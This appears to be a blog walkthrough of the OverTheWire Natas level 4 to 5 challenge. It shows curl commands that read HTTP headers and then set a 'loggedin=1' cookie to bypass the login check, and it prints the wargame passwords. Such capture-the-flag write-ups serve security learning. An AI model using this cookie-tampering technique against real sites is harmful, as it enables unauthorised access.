Post

Overthewire Natas Level 4 -> Level 5

Posted Updated
By Michael McDonagh
1 min read

Solution for the Overthewire.org Natas level 4 -> Level 5

Description

Username: natas5

URL: natas5.natas.labs.overthewire.org

Solution

Visit the url http://natas5.natas.labs.overthewire.org in the browser and we get a prompt for login.

Use the username natas5 and the password obtained from the previous challenge.

Once logged in we get an Access disallowed message.

Natas 5 home page

Checking the source code does not give any new information.

In the previous challenge we looked at the HTTP headers so let’s check them again.

Using curl --head --user <USERNAME>:<PASSWORD> --url <URL> syntax we can view the headers.

1
2
3
4
5
6
7
8
9

$ curl --head --user natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq --url http://nata
s5.natas.labs.overthewire.org

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2022 23:55:42 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: loggedin=0
Content-Type: text/html; charset=UTF-8

We can see in the headers that there is a cookie being set.
Set-Cookie: loggedin=0

Let’s set loggedin to 1 and see what differences occur. We can passed cookie data using the --cookie option in curl.

1
2

curl --user natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq --cookie "loggedin=1" --url http:/
/natas5.natas.labs.overthewire.org/

The response we get tells us Access granted and the password.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
Access granted. The password for natas6 is aGoY4q**************************</div>
</body>
</html>

The password for the next challenge is aGoY4q**************************.

OverTheWire, Natas
overthewire natas web
This post is licensed under CC BY 4.0 by the author.